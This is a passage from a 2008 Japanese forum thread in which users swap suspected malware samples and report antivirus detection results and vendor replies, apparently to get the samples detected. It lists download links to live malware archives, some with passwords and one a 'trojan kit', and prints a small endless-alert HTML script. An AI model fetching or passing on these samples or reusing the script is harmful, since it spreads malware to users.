1個検出:Rising(キラー)

まとめは雑だけどこんな感じ、それにしてもNODが全検出って・・・・しかも3日で対応とか・・・・
他のベンダーも大体2〜3日で対応できてるね、あと主要ベンダーと弱小ベンダーの差はここでも出てるな、Virusbusterとかほとんど検出できてないし

674 :名無しさん@お腹いっぱい。:2008/11/05(水) 07:58:41
VirusBusterとか誰も送らんだろw

675 :名無しさん@お腹いっぱい。:2008/11/05(水) 12:20:28
>>655
Risingに送ってきました

676 :名無しさん@お腹いっぱい。:2008/11/06(木) 15:31:28
>>673
good job

677 :名無しさん@お腹いっぱい。:2008/11/06(木) 20:00:53
ところで、VirusTotalから各ベンダーには、検体情報は流れるの?
ベンダーからシグネチャとエンジンもらっているだけという人もいれば、その見返りにベンダーにVTの情報を提供しているという人もいる。


教えてエロイ人

678 :名無しさん@お腹いっぱい。:2008/11/06(木) 20:07:31
ベンダー次第じゃねーの?
10件以上判定出たらくれとか全くいらねとか。

679 :名無しさん@お腹いっぱい。:2008/11/07(金) 00:44:47
半自動で送り付けてるんだろうとは思います
少なくともいえることは、ベンダに通報しないことができなくなったということ

680 :名無しさん@お腹いっぱい。:2008/11/07(金) 09:14:41
http://im3a.atura.jp/bbs5/31207/img/0005871719.zip
news

681 :名無しさん@お腹いっぱい。:2008/11/07(金) 09:31:00
>>680
>>3

きりがないので、こういうのは他所で鑑定済みのものに限る

682 :名無しさん@お腹いっぱい。:2008/11/07(金) 19:44:15
>>680
ttp://www.virustotal.com/jp/analisis/a953eea976b81d3eb1944f202be19ea8
結果: 36/36 (100.00%) ワロタ

683 :659:2008/11/08(土) 01:34:50
とりあえずトレンドマイクロにウイルスバスター2009でPAK_Genericを検出できない件について問い合わせしてみた
単なる不具合ならアップデートで改善して欲しいところ

スレチ失礼しました

684 :名無しさん@お腹いっぱい。:2008/11/08(土) 18:24:00
バスターのリアルタイム検索は、パッカーの面倒までみないだけじゃないの?
VTの結果を確認するのに、何故リアルタイム検索なのかよく分からんけど…

685 :659:2008/11/08(土) 21:07:47
いや、手動検索でもまったく無反応なんだよね>PAK_Generic

とりあえず問い合わせ結果次第でこのスレに貼るつもりです

686 :名無しさん@お腹いっぱい。:2008/11/09(日) 01:55:37
ttp://www.websafenotice.com/v6/05-12flo9/v1/

ここ結構更新してる方?

687 :名無しさん@お腹いっぱい。:2008/11/09(日) 02:24:03
>>686
http://pc11.2ch.net/test/read.cgi/sec/1224605615/438-440
↑ですね

virlab_install.exeは見つかったので、McAfeeに提出させて頂ました。
ttp://www.virustotal.com/jp/analisis/2528d541bc8caa9760534ff6ebe69a3d

688 :名無しさん@お腹いっぱい。:2008/11/09(日) 19:55:58
http://tnpt.net/uploader/src/up24741.exe

689 :名無しさん@お腹いっぱい。:2008/11/09(日) 20:22:39
>>688
ttp://so.7walker.net/index.php?site=http%3A%2F%2Ftnpt.net%2Fuploader%2Fsrc%2Fup24741.exe&hua=
ttp://www.virustotal.com/jp/analisis/09641a2d3fb67e5840dcd664a93baefa

690 :名無しさん@お腹いっぱい。:2008/11/09(日) 22:31:18
>>688
カスペ2009
スルーなので、検体提出します。

691 :690:2008/11/09(日) 23:19:21
>>688
カスペからの返事。有害ファイルのようだが、検体名不明。

From: newvirus@kaspersky.com [mailto:newvirus@kaspersky.com]
Sent: Sunday, November 09, 2008 11:11 PM
Subject: RE: Quarantined object; A New Malware? Please Inspect the file. up24741.exe [KLAN-13338568]

New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.

692 :名無しさん@お腹いっぱい。:2008/11/10(月) 14:23:42
>>688
有害なbatファイルを生成しますね。
(スタートアップに自分自身をコピーし、1秒後に再起動)


693 :名無しさん@お腹いっぱい。:2008/11/10(月) 17:17:20
>>689
本日のスキャン結果
ttp://www.virustotal.com/jp/analisis/c12e3da9faca2380e8b56cb32fa0d2f7
検出:AntiVir,F-Secure,Kaspersky,SecureWeb-Gateway

694 :名無しさん@お腹いっぱい。:2008/11/10(月) 18:36:32
実質2つかw

695 :名無しさん@お腹いっぱい。:2008/11/10(月) 19:50:21
>>692,693
無限再起動ループさせるのかこのウイルス カグブル

696 :名無しさん@お腹いっぱい。:2008/11/11(火) 18:26:06
セーフモードで起動してスタートアップからse.bat消せばいいだけ
実はただの糞プログラムでしたw

697 :名無しさん@お腹いっぱい。:2008/11/11(火) 18:34:48
Virustotalの9月以降の解析データ吹っ飛んでるね

698 :名無しさん@お腹いっぱい。:2008/11/12(水) 12:44:39
http://www.geocities.jp/oresamamansee/saichuu.lzh

699 :名無しさん@お腹いっぱい。:2008/11/12(水) 17:30:09
>>698
ファイル名 saichuu.lzh
ttp://www.virustotal.com/jp/analisis/5160346c53c5c51a4265f633792438b9
↓解凍
(個人撮影)(無修正)(2ch女神)(再厨紳士)[051016] 再厨系ZIPパス辞書 これでピカれ!随時更新!
ファイル名 __________________________2ch____
ttp://www.virustotal.com/jp/analisis/d7ce57988655f15aead6da014a764f3f
↓ZIP展開
(個人撮影)(無修正)(2ch女神)(再厨紳士)[051016] 再厨系ZIPパス辞書 これでピカれ!随時更新!
ファイル名 saichudic.txt
ttp://www.virustotal.com/jp/analisis/911420c79963b61b3fc0baa02ab4eab1

700 :名無しさん@お腹いっぱい。:2008/11/12(水) 23:10:27
鑑定アリトゥーッスww

701 :名無しさん@お腹いっぱい。:2008/11/12(水) 23:20:00
【重要】
●ここは鑑定スレではありません。malwareのみお願いします。
割れ厨やネトゲチート厨がここで鑑定させようとすることがありますが、スルーしてください。

702 :名無しさん@お腹いっぱい。:2008/11/14(金) 08:34:27
http://www.koha0kohaweb.com/data/mec/uporg1780053.zip

703 :名無しさん@お腹いっぱい。:2008/11/14(金) 16:22:50
>>702
ttp://www.virustotal.com/analisis/d599d8e2f2221deb773272e99a1d73a5

704 :名無しさん@お腹いっぱい。:2008/11/14(金) 16:28:14
http://www.hackpalace.com/virii/makers/trojan%20kit.zip

705 :名無しさん@お腹いっぱい。:2008/11/14(金) 16:34:57
>>704
http://www.virustotal.com/jp/analisis/3644d503c8d646c48b407fc0d452ed25

706 :名無しさん@お腹いっぱい。:2008/11/14(金) 18:12:11
ブログ民・ブログ店に仕込まれたネトゲトロイ(ブログ板参照)
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=111
virus

707 :名無しさん@お腹いっぱい。:2008/11/14(金) 18:19:24
>>702
McAfeeに提出させて頂ました。

708 :名無しさん@お腹いっぱい。:2008/11/14(金) 18:36:13
>>706
McAfeeに提出させて頂ました。

709 :名無しさん@お腹いっぱい。:2008/11/14(金) 19:45:06
bho1.exe
http://www.virustotal.com/jp/analisis/a59034ece6d24269c2c5e16c32d956ba
dldr0.exe
http://www.virustotal.com/jp/analisis/765e28cc498dbf6f8c29d5c74d30b675
dldr1.exe
http://www.virustotal.com/jp/analisis/f7521c2096a4b49f516f4223221ba3af
lineage2.exe
http://www.virustotal.com/jp/analisis/2c97e6ac8c62f63ca00ad60d234233ba
pol_ffxi.exe
http://www.virustotal.com/jp/analisis/2ea7810229819eb5a7b9a98fbb5b911a

710 :名無しさん@お腹いっぱい。:2008/11/14(金) 21:50:33
>>706
d
カスペ2009 20:37:00

3/5

Detected adware not-a-virus:AdWare.Win32.BHO.dxq tane0111.zip/bho1.exe
Detected Trojan program Trojan-Downloader.Win32.Agent.aoks tane0111.zip/dldr0.exe
Detected Trojan program Trojan-Downloader.Win32.Agent.ajwx tane0111.zip/dldr1.exe

lineage2.exe,pol_ffxi.exeについて検体提出します。

711 :名無しさん@お腹いっぱい。:2008/11/14(金) 23:39:45
85 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/11/14(金) 21:54:17
http://  zakopero.hp.infoseek.co.jp/3.html  ← 注意 ウィルス

すみません ↑これ踏んじゃったんですけど 対処はどうしたらいいでしょうか
よろしくお願いします。

712 :名無しさん@お腹いっぱい。:2008/11/14(金) 23:45:53
ここはそういうスレではありません。
質問スレとかあるだろ。

713 :名無しさん@お腹いっぱい。:2008/11/15(土) 00:30:40
<HTML>
<BODY>

<SCRIPT>
for(;;) {
alert('シォカネシォニタ、タ、ハ;(釈;ァリ;釈;)');
}
</SCRIPT>

</BODY>
</HTML>


だって。FOR文でまわしてるだけだから、プロセス落とせばいいだけ。
アラートにあるとおり、自業自得だな。

714 :710:2008/11/15(土) 11:19:06
>>706
返事は来ないが、検知したので対応した模様。 3+追加2 = 5/5

Detected Trojan program Trojan.Win32.Delf.gah lineage2.exe
Detected Trojan program Trojan-PSW.Win32.Nilage.dma pol_ffxi.exe

715 :名無しさん@お腹いっぱい。:2008/11/16(日) 08:53:14
>>706
Panda GlobalProtection2009
dldr1.exeはヒューリスティック検出
bho1.exeはスルー
それ以外はTruPreventで検出(Virustotalにも反応なし)

716 :名無しさん@お腹いっぱい。:2008/11/16(日) 09:07:07
追記
PandaはヒューリスティックTruprevent問わず未知のウイルスを最初は検出するんだけどその後同じファイルをスキャンすると何故かスルー・・・
これ不具合なのかな?さすがにこんなのは困る

717 :名無しさん@お腹いっぱい。:2008/11/16(日) 11:53:41
http://www.koha0kohaweb.com/data/mec/uporgf1780054.zip

718 :名無しさん@お腹いっぱい。:2008/11/16(日) 12:22:14
>>717
Kaspersky
LINEAG~3.EXE Trojan-Dropper.Win32.Agent.zgw
LINEAG~1.EXE Trojan.Win32.Inject.jzc

719 :名無しさん@お腹いっぱい。:2008/11/16(日) 13:35:35
>>717
Panda GlobalProtection2009
LINEAG_3.EXEはヒューリスティックで検出
LINEAG_1.EXEはスルー

ちなみに検出したあと同ファイルをスキャンするとスルーするという現象、どうやら検疫ファイルから復旧後勝手に除外ファイル設定される
通りで検出しないと思ったら・・・・

720 :名無しさん@お腹いっぱい。:2008/11/16(日) 14:23:47
>>706
11/16時点の検出状況

http://www.virustotal.com/analisis/946a9f8a68ad3c036fe3840d746e539d
http://www.virustotal.com/analisis/4a8a8894ba7898fba0dc837d4bd9b919
http://www.virustotal.com/analisis/47ac5f58983243c08aab23083059306d
http://www.virustotal.com/analisis/d9df8dd47383a7dedb9cd83657fcae11
http://www.virustotal.com/analisis/a0d542b534cc75b882ae3ba0e8b18d3a

ところでPanda以外で「検出するけどVirustotalでは反応しないウイルスが多い」というベンダーってある?
Pandaはそういう点では面白いベンダーだな

721 :名無しさん@お腹いっぱい。:2008/11/16(日) 16:14:32
>>717
NOD32
uporgf1780054.EXE Win32/PSW.OnlineGames.ODD亜種

ファイル単体を手動解凍させてから検査したところ、
LINEG~1.EXE スルー
LINEG~3.EXE Win32/PSW.OnlineGames.ODD亜種

722 :名無しさん@お腹いっぱい。:2008/11/16(日) 16:40:46
>>717
http://www.virustotal.com/jp/analisis/3d71ebff9e29b51e31795228b5d891e1
ノートンやバスター、マカフィーでは検出せず
AntiVir、avast、AVG、ClamAVでは検出
フリーの方が優秀だな

723 :名無しさん@お腹いっぱい。:2008/11/16(日) 16:49:04
2匹を圧縮してあるからVTに投げる場合は解凍してくれ

724 :名無しさん@お腹いっぱい。:2008/11/16(日) 16:52:49
ZIPで検出しないソフトなんだから解凍したって1匹も検出できないことはわかってる

725 :名無しさん@お腹いっぱい。:2008/11/16(日) 17:24:01
圧縮した場合はこんな感じ

http://www.virustotal.com/analisis/d3f806e4ce2b8ae95638452431a11698
http://www.virustotal.com/analisis/895c370d5b456376a57740ef04b008a4
LINEAG_1.EXEはAVG、Symantec、バスターが検出してLINEAG_3.EXEはAVGとバスターがスルー、それ以外の主要ベンダーが検出という感じ
両方検出してるのはSymantecとKasperskyとMicrosoft

726 :名無しさん@お腹いっぱい。:2008/11/16(日) 17:24:47
訂正

× 圧縮した場合はこんな感じ
○ 解凍した場合はこんな感じ

727 :名無しさん@お腹いっぱい。:2008/11/16(日) 17:27:31
ちなみに華麗に両方スルーはウイルスセキュリティZERO(爆笑)ですな

728 :名無しさん@お腹いっぱい。:2008/11/16(日) 17:46:47
ってことは、>>722で検出できないけど>>725で検出するソフトは
ZIPの展開もまともにできないソフトか
それもまた問題だな

729 :名無しさん@お腹いっぱい。:2008/11/16(日) 17:53:27
>>728
その理屈だとノートン、バスターよりNOD29の方が優秀ってことになるんですがw
・・・・んなわけねーだろ

730 :名無しさん@お腹いっぱい。:2008/11/16(日) 17:54:36
PnadaGlobalProtection2009で>>722はTruPreventで検出

731 :名無しさん@お腹いっぱい。:2008/11/16(日) 17:55:27
Pandaと書こうとしたのにPnadaって・・・

732 :名無しさん@お腹いっぱい。:2008/11/16(日) 18:01:23
>>729
君、頭は大丈夫?
もう少しきちんと読んでから発言したほうが良いよw

733 :名無しさん@お腹いっぱい。:2008/11/16(日) 18:10:51
いや別にw
一箇所突っ込みどころ(NOD29)があったからそこを突っ込んでみただけ

734 :名無しさん@お腹いっぱい。:2008/11/16(日) 18:18:29
>>733
あれ?
答えになってないよw
ひょっとして翻訳ソフトを使って日本語を中国語やハングルに訳してるから
どこがおかしいのか分からないとかかな?

735 :名無しさん@お腹いっぱい。:2008/11/16(日) 18:21:00
↑そんなにNODを否定されるのが嫌かww

>答えになってないよw

だからこういうことでしょ

728 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/11/16(日) 17:46:47
ってことは、>>722で検出できないけど>>725で検出するソフトは
ZIPの展開もまともにできないソフトか
それもまた問題だな

736 :名無しさん@お腹いっぱい。:2008/11/16(日) 18:29:16
>>735
NODなんか使ったことないから否定でも肯定でも構わないよ
問題は>>728から>>729を結論として導き出したところにある
>>728の内容を理解していれば>>729のような結論は出ない

君は無理やりNODを否定したがっている人物か、
日本語を理解する能力に乏しい人物ではないのかね?

737 :名無しさん@お腹いっぱい。:2008/11/16(日) 18:29:27
VT等はログの1行(最初か最後かは知らん)しか拾わないんだから
複数ファイルが入った書庫はバラさないとだめなんすよ。

738 :名無しさん@お腹いっぱい。:2008/11/16(日) 18:33:35
>>737
かなり妄想癖があるようだね
どこにそんな規定があるのかな?
http://www.virustotal.com/jp/sobre.html

739 :名無しさん@お腹いっぱい。:2008/11/16(日) 18:35:01
>>736
だから728をコピペしてるということは728は全面同意してるんだが

>問題は>>728から>>729を結論として導き出したところにある
>>728の内容を理解していれば>>729のような結論は出ない
>君は無理やりNODを否定したがっている人物か、

要は「話しが噛み合ってない」ってことでしょ、これはこちらがスマソ

で、NODは本当に酷いソフトなんだよね

740 :名無しさん@お腹いっぱい。:2008/11/16(日) 18:43:32
ノートンとバスターは圧縮ファイル検出に関しては以前から指摘されてたような気がする
バスターは一応圧縮ファイルスキャンできるけど6階層までなんだよね(今回のファイルは2階層だからそういうことでもないだろうけど)

741 :名無しさん@お腹いっぱい。:2008/11/16(日) 19:11:02
>>739
> だから728をコピペしてるということは728は全面同意してるんだが

スゲー負け惜しみにしか見えないw

742 :名無しさん@お腹いっぱい。:2008/11/16(日) 23:09:48
>>741
まだやってたのかよwww

そもそも最初からカスペやフリーソフトに全く触れなかった時点で728の主張を認めてたってこと
で、ノートンやバスターにそういう問題があったとしてもそれでNODより劣るのか?ということなんだが

ま、ノートンやバスターの圧縮ファイル検出問題とNODの低検出の問題は関係ないから確かに俺の言ったことは頓珍漢だった、それは認める

743 :名無しさん@お腹いっぱい。:2008/11/16(日) 23:36:00
>・淡々とやれ淡々と!
> 淡々と貼り、淡々といきましょう。
>・あらしはスルー。ソフトの優劣の議論は別スレで!
淡々といこう

744 :名無しさん@お腹いっぱい。:2008/11/16(日) 23:38:15
>>・あらしはスルー。ソフトの優劣の議論は別スレで!

そのソフトの優劣として議論するはずの「一番いいセキュソフトはどれか?」のスレなんだけどカスペ叩きコピペ(しかも捏造)の連投ばかりでスレが機能してないんですが・・・・

745 :名無しさん@お腹いっぱい。:2008/11/16(日) 23:45:11
ttp://www1.axfc.net/uploader/He/so/159518.zip
パスはzipです。

746 :名無しさん@お腹いっぱい。:2008/11/16(日) 23:59:18
>>745
http://www.virustotal.com/analisis/43c93c9b084c829174eeceb1089b17c9

747 :名無しさん@お腹いっぱい。:2008/11/17(月) 12:57:50
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=112

DLPASS:virus

748 :名無しさん@お腹いっぱい。:2008/11/17(月) 16:45:42
>>747
d
カスペ2009

スルー
検体提出しました。

749 :名無しさん@お腹いっぱい。:2008/11/17(月) 17:27:33
全農ホームページへの不正アクセスに関するお詫びとお願い
ttp://www.zennoh.or.jp/
検体キボン

750 :名無しさん@お腹いっぱい。:2008/11/17(月) 17:33:53
>>747
http://www.virustotal.com/analisis/6aff239b5961941567a294e4a7585c92

751 :名無しさん@お腹いっぱい。:2008/11/17(月) 17:44:29
>>747
avast!のチェストファイルから提出
PandaとBitDefenderにも提出
TrendMicroにも提出したけど既に提出されてるっぽい?
Symantecへの提出は誰か頼む

752 :748:2008/11/17(月) 18:07:07
>>747
カスペからの返事

差出人: newvirus@kaspersky.com
送信日時: 2008年11月17日 月曜日 17:49
件名: RE: Quarantined object; A Suspicious File. A New Malware?"lhozhzuevsctvnj.exe" [KLAN-16898707]

No malicious software was found in the attached file.

753 :名無しさん@お腹いっぱい。:2008/11/17(月) 19:28:08
>>747
McAfee提出完了


754 :名無しさん@お腹いっぱい。:2008/11/17(月) 19:33:31
>>747
McAfee提出完了

>>717>>723>>725
解凍の手順の詳細をご教示願いませんでしょうか

755 :名無しさん@お腹いっぱい。:2008/11/17(月) 19:46:05
自己解凍(SFX)扱えないクソソフトでもなければ
普通に解凍ソフトで解凍できるだろ…。


756 :名無しさん@お腹いっぱい。:2008/11/17(月) 19:52:51
最近Kasperskyが相手してくれない…。
送りすぎるとSPAM扱いでブラックリスト入り?
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=113
virus

757 :名無しさん@お腹いっぱい。:2008/11/17(月) 20:22:54
>>756
Rising Internet Security 2009
xrea36.exe: Trojan.PSW.Win32.OnLineGames.aaaa

758 :名無しさん@お腹いっぱい。:2008/11/17(月) 20:23:27
検出したものは名前を変えてVTスキャン

http://www.virustotal.com/analisis/543620b9672eb54a9e0f01837992095e
http://www.virustotal.com/analisis/20db61e89a65329bee2c0a438648786b
http://www.virustotal.com/analisis/8ddcf095d46ebecfd92180a6b5894fd5
http://www.virustotal.com/analisis/9012e1eb99439139a22012d02ca7f9fd
http://www.virustotal.com/analisis/bdc03d54b662059523d74555cb00cd4d
http://www.virustotal.com/analisis/8fe7e2b29811cab619012f7e83007346
http://www.virustotal.com/analisis/933ee292aac2a7a9e78823a9cb6b260a

PandaGlobalProtection2009はunknown1.exeのみTruPrevent検出という寂しい結果に

759 :名無しさん@お腹いっぱい。:2008/11/17(月) 20:25:21
ん・・・?
今VTをよく見たらPandaがやたらとヒューリスティックで鬼検出してる・・・
なんでうちのPandaではスルーが多かったんだろ・・・?

760 :名無しさん@お腹いっぱい。:2008/11/17(月) 20:41:35
>>756
McAfeeに光速の早さでで送信したよーヽ( ^ω^)ノ

761 :659:2008/11/17(月) 21:03:46
ウイルスバスター2009のPak_Genericを検出できない件について返事が来た、以下抜粋

-----------------------------------------------------------

このたびの件ではご不便をおかけして大変申し訳ございません。
またご連絡が遅れておりますことをお詫び申し上げます。

お問い合わせいただいております件ですが、今回ご連絡いただいておりますウイルスへの対応ですが、一度、ウイルスの実物を検体としていただき解析させていただきたいと存じます。その実物を元に対応するパターンファイルの作成などが可能となってまいります。

そのためまずは対応可能となるか確認のため、お手数ですが現物をご提供くださいますようお願いいたします。

いただき次第早急に調査をさせていただきたいと存じます。

恐れ入りますが、下記手順にて検出されたファイルを弊社までご提供ください
ますようお願いいたします。
-----------------------------------------------------------


とりあえずここでPAK_Generic検出した検体をZipファイルに固めて送っといた
サポートの質が低下してるといわれてるトレンドマイクロだけど意外とまともな返事が来て安心した

762 :659:2008/11/17(月) 21:06:42
>>756
ついでにトレンドマイクロに提出しといた

763 :名無しさん@お腹いっぱい。:2008/11/17(月) 23:01:04
>>756
d
カスペ2009 22:17:00

1/6

Detected Trojan program Heur.Trojan.Generic unknown2.exe

764 :763:2008/11/17(月) 23:01:30
全体検体提出します。

765 :名無しさん@お腹いっぱい。:2008/11/18(火) 00:32:38
検体提出、パターン対応のテンプレ対応で済む問題程度なら問題ない…
んが、ちょっとテクニカルな突込みが入るとグダグダになる。

766 :名無しさん@お腹いっぱい。:2008/11/18(火) 01:20:56
http://www1.axfc.net/uploader/He/so/159983&key=winrar

767 :名無しさん@お腹いっぱい。:2008/11/18(火) 07:21:55
>>766
Crack.exe
>>3

768 :名無しさん@お腹いっぱい。:2008/11/18(火) 17:38:52
>>756
カスペ2009 @ 17:15:00
7/7

Detected Trojan program Trojan-Dropper.Win32.Agent.ztm unknown2.exe
Detected Trojan program Trojan-GameThief.Win32.Magania.akpk unknown1.exe
Detected Trojan program Trojan-GameThief.Win32.Magania.akpl unknown3.exe
Detected Trojan program Trojan.Win32.Agent.anzk wow1_0.exe
Detected Trojan program Trojan.Win32.Agent.anzk wow1_1.exe
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.ttgy xrea36.exe
Detected Trojan program Trojan-GameThief.Win32.OnLineGames.ttgi xrea36t.exe

769 :名無しさん@お腹いっぱい。:2008/11/18(火) 19:30:56
>>766
ttp://so.7walker.net/index.php?http%3A%2F%2Fp1-trans.axfc.net%2Fuploader%2FHe%2Fl%2F8812527044%2FHe_159983.zip
ttp://www.virustotal.com/jp/analisis/2bacc413292012582fe5e65b73870efa

Crack.exe
ttp://www.google.co.jp/search?source=ig&hl=ja&rlz=1G1GGLQ_JAES302&q=Crack.exe&btnG=Google+%E6%A4%9C%E7%B4%A2&meta=lr%3Dlang_ja&aq=f
ttp://72.14.235.132/search?q=cache:asLCh9OATR8J:www.mcafee.com/japan/security/virB.asp%3Fv%3DW32/BlueECard%40MM+Crack.exe&hl=ja&ct=clnk&cd=7&gl=jp&lr=lang_ja

>>766
ベンダーへ検体として投げ検出の可否を確認する為
試しにMcAfeeに提出させて頂ました

770 :名無しさん@お腹いっぱい。:2008/11/18(火) 19:38:44
>>700

771 :名無しさん@お腹いっぱい。:2008/11/19(水) 22:15:40
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=114
pass:virus

http://www.virustotal.com/jp/analisis/2d51af6dfdfd99af1f42f8db33daa6d8
トロイらしい

772 :名無しさん@お腹いっぱい。:2008/11/19(水) 22:32:06
>>771
カスペに送りました。

773 :名無しさん@お腹いっぱい。:2008/11/19(水) 22:44:08
>>771
McAfeeに提出させて頂ました。

774 :名無しさん@お腹いっぱい。:2008/11/19(水) 22:55:51
>>771
AVG、BitDefender、Panda、Symantec、TrendMicroに提出

775 :名無しさん@お腹いっぱい。:2008/11/19(水) 23:06:39
主要ベンダーに一通り検体送ってるけど

返事が来るベンダー:Symantec、Kaspersky、TrendMicro、AVG、AntiVir
返事が来ないベンダー:avast!、BitDefender、ESET、Panda

こんな感じだな、NormanとSophosには送ったことないからわからん

776 :名無しさん@お腹いっぱい。:2008/11/20(木) 17:47:02
>>775
最近AVGから返事来ないぞ

777 :名無しさん@お腹いっぱい。:2008/11/20(木) 17:48:14
最近AVGから返事来ないぞ

778 : ◆W32/Vael.o :2008/11/20(木) 19:48:49
ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=115
Malware-Pack49

例によってMcAfeeには提出済み

779 :名無しさん@お腹いっぱい。:2008/11/20(木) 20:58:23
恐くて踏めないURLを、悪質かどうか判定してやる
http://dubai.2ch.net/test/read.cgi/news/1227175796/

780 :名無しさん@お腹いっぱい。:2008/11/20(木) 22:33:43
>>778
カスペ2009 19:26:00

6/12


Detected virus not-a-virus:FraudTool.Win32.Agent.dn 4\realav.exe
Detected virus not-a-virus:FraudTool.Win32.AntiSpySpider.bu 1\antispyknight.msi//Cabs.w1.cab/antispyknight.exe
Detected virus not-a-virus:FraudTool.Win32.TotalSecure2009.ai 2\WinDefender2009.exe
Detected virus not-a-virus:FraudTool.Win32.ErrorSmart.a 3\setup.exe//ErrorSmart.exe
Detected Trojan program Trojan-Downloader.Win32.FraudLoad.vdre 5\IAInstall.exe
Detected Trojan program Trojan-Ransom.Win32.Hexzone.gfl 7\flowMediaDecoder_23.exe//tprlib.dll

検体提出します。


>>771は、まだ反応しないな。(´・ω・`)ショボーン

781 :名無しさん@お腹いっぱい。:2008/11/20(木) 23:30:06
書く板間違えたけど20:50の時
880 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/11/20(木) 20:52:01
AntiVir 4/12
0 TR/Dropper.Gen [trojan]
2 DR/Fraud.WinDefend [dropper]
3 DR/Fraud.ErrorSmart.A [dropper]
4 PHISH/Fraud.Agent.DN [phishing]
25173930 antispyknight.msi        1.23 MB CLEAN
25193117 IAInstall.exe            49 KB UNDER ANALYSIS
25193118 yahya.exe            832 KB UNDER ANALYSIS
25192165 flowMediaDecoder_23.exe  303.4 KB MALWARE
25193119 PlanilhaDaFaturaD...da.scr  164.5 KB MALWARE
25192541 LiteVideocodecVer.4.exe     27 KB MALWARE
25193120 Lbe.Resource.Book...26.exe 109.98 KB UNDER ANALYSIS
25192793 A9installertest_7...04.exe    156 KB MALWARE
今は0,2,3,47,8です。(23:30)

782 :名無しさん@お腹いっぱい。:2008/11/21(金) 00:03:05
>>778
NOD32 Ver3.0 (21:50時点)
2 WinDefender2009.exe > NSIS > windef.exe - Win32/Adware.IeDefender.NHA亜種の可能性
4 realav.exe - Win32/Kryptik.BCの亜種 - トロイの木馬
5 IAInstall.exe - Win32/Kryptik.BUの亜種 - トロイの木馬
7 flowMediaDecoder_23.exe Win32/Hexzone.S - トロイの木馬
9 LiteVideocodecVer.4.exe Win32/TrojanDownloader.Agent.OML - トロイの木馬
a Lbe.Resource.Booker.1.0.106n3226.exe > NSIS > jah32262.exe - Win32/Keyptik.BTの亜種 トロイの木馬


783 :名無しさん@お腹いっぱい。:2008/11/21(金) 00:17:21
>>778
NIS2009で 5/12 (1、2、4、5、b)
未検出は贈っておきました

784 :780:2008/11/21(金) 00:37:29
カスペからの返事

>>778

Hello,

DSC1435.exe_ - Trojan-Banker.Win32.Banbra.eyd
LiteVideocodecVer.4.exe_ - Trojan.Win32.BHOLamp.q
Lbe.Resource.Booker.1.0.106n3226.exe_ - Trojan.Win32.Agent.aotk
v2p.exe_ - Trojan-Downloader.Win32.Agent.apyz

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

yahya.exe_

No malicious code was found in this file.

Please quote all when answering.



6+追加5=11/12 (6\yahya.exeは白)

785 :名無しさん@お腹いっぱい。:2008/11/21(金) 00:47:13
カスペは速いね、いつもながら

786 :780:2008/11/21(金) 09:54:57
>>771
カスペからの返事

Hello,

oySetupJ.exe_

No malicious code was found in this file.

Please quote all when answering.
The answer is relevant to the latest bases from update sources.

787 :名無しさん@お腹いっぱい。:2008/11/21(金) 19:54:23
File ID Filename Size (Byte) Result
25173930 antispyknight.msi 1.23 MB CLEAN
25193117 IAInstall.exe 49 KB MALWARE
25193118 yahya.exe 832 KB CLEAN
25192165 flowMediaDecoder_23.exe 303.4 KB MALWARE
25193119 PlanilhaDaFaturaD...da.scr 164.5 KB MALWARE
25192541 LiteVideocodecVer.4.exe 27 KB MALWARE
25193120 Lbe.Resource.Book...26.exe 109.98 KB MALWARE
25192793 A9installertest_7...04.exe 156 KB MALWARE

788 :検体きぼん:2008/11/21(金) 22:20:42
ttp://mamono.2ch.net/test/read.cgi/newsplus/1226925487/

の件ですが、全農にはウイルスの検体はないそうです
McAfeeとSymantecの代理店経由で全農に対して検体の提供要請はあったそうですが
全農の勘違い?から、サイトに仕込まれたscriptを検体としてMcAfeeに送ったそうです
script先のサイトは閉じているとの事で全農からの検体入手は困難となりそうです
公開されているウイルス以外に二つ程のウイルスが有るとの事でしたが
そちらは手元に検体としてある様な話でした


余談とはなりますが、侵入者のIPアドレスは59.34.148.29らしいです

789 :名無しさん@お腹いっぱい。:2008/11/21(金) 22:51:35
http://www.dotup.org/uploda/www.dotup.org6285.zip
pass:news

790 :名無しさん@お腹いっぱい。:2008/11/21(金) 23:00:35
>>789
何もないんだが

791 :名無しさん@お腹いっぱい。:2008/11/22(土) 03:57:34
>>788
そのスクリプトに書いてあったURLわからんの?
それで既出かどうかくらいはわかる。

792 :791:2008/11/22(土) 04:04:34
IPググったら出てきた。
攻撃元とウイルス配布サーバが同じだとしたら
これ各社に検体送ってあるわ。

793 :名無しさん@お腹いっぱい。:2008/11/22(土) 13:19:17
>>778
PandaGlobalProtection2009

ウイルス発見 : Trj/CI.A 除去 IAInstall.exe
アドウェアを検出 : Adware/Antivirus2009 隔離に移動済み A9installertest_77025304.exe
アドウェアを検出 : Adware/RealAntivirus 隔離に移動済み realav.exe
ウイルス発見 : Generic Trojan 除去 WinDefender2009.exe
ウイルス発見 : Trj/Downloader.MDW 通知済み antispyknight.msi[unk_0019][antispyknight.exe]

LiteVideocodecVer.4.exeとDSC1435.exeとflowMediaDecoder_23.exeはTruPrevent検出

794 :名無しさん@お腹いっぱい。:2008/11/22(土) 13:37:48
検出したものはファイル名を変えてVTスキャン

http://www.virustotal.com/analisis/130c0c314134f5f77b5cc70fbd23d902
http://www.virustotal.com/analisis/4dc203e9ccd2ed17c1aa8f1f244b1d1f
http://www.virustotal.com/analisis/1b74c94a2eb32b9c91795b81a2ebfd39
http://www.virustotal.com/analisis/7a19deb34d0299c59729ed7410e8471f
http://www.virustotal.com/analisis/cec89645f3ff6a5f478c5882f2fbdf45
http://www.virustotal.com/analisis/c9292492490e14533a129240a6e91021
http://www.virustotal.com/analisis/5384b4b93e85fa2c1de2b6838b12e389
http://www.virustotal.com/analisis/138fbba89150a47f1beefa5110598075
http://www.virustotal.com/analisis/3b2dcfa69d71bd9966f924fffc175030
http://www.virustotal.com/analisis/a8b927e5c54c9fd3a04634d05e0e4a7f
http://www.virustotal.com/analisis/031806684c6ef7aaa60f831db3c778d3
